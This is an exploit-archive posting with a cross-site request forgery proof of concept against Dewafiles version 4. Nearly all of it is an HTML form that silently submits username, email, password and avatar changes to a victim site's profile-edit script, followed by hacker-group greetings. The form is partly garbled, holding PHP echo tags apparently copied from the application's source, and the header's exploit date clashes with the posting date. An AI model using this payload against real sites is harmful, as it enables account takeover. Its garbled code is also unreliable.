Home / exploits Dewafiles 4 Cross Site Request Forgery
Posted on 08 June 2013
# Exploit Title: Dewafiles Versi 4 - CSRF Vulnerabilities # Author Exploit : vir0e5 # Date : 08-06-2012 # Site : http://blog.megasoft-id.com/ # Vendor : http://blog.megasoft-id.com/article/dewafiles/ # Version : Dewafiles versi 4 # Software Link: http://blog.megasoft-id.com/article/dewafiles/ # Tested on : Window and Linux # CVE : [not yet] [ Vulnerable File ] ~ proses_edit_profile.php [ Exploit ] <form enctype="multipart/form-data" action="http://korban.com/proses_edit_profile.php" method="POST"> <input type="hidden" name="id" value="<?PHP echo $id; ?>"> <p><me>Username</me></br> <input type="text" style="width:100%" required name='username' value="<?PHP echo $_SESSION['my_name']; ?>"> <p><me>Email</me></br> <input type="text" style="width:100%" required name='email' value="<?PHP echo $email; ?>"> <p><me>Password</me></br> <input type="password" style="width:100%" required name='pswd' value="<?PHP echo $pswd; ?>"> <p><me>Gender</me></br> <select style="width:100%" required name="gender"> <option><?PHP echo $gender; ?></option> <option>Male</option> <option>Female</option> </select> <p><me>Your Avatar</me></br> <img src="<?PHP echo $photo ?>" width="60" height="60"></br> Default Avatar : "<?PHP echo $photo; ?>"</br> Change => <input style="width:200px" type="file" name="photo"> <p> <input type="submit" class="button" value="Save"> </form> ************************************************************* [+] Greetz :INDONESIAN SECURITY - TASIK CYBER - INDONESIAN CODER - EXPLOIT-ID;
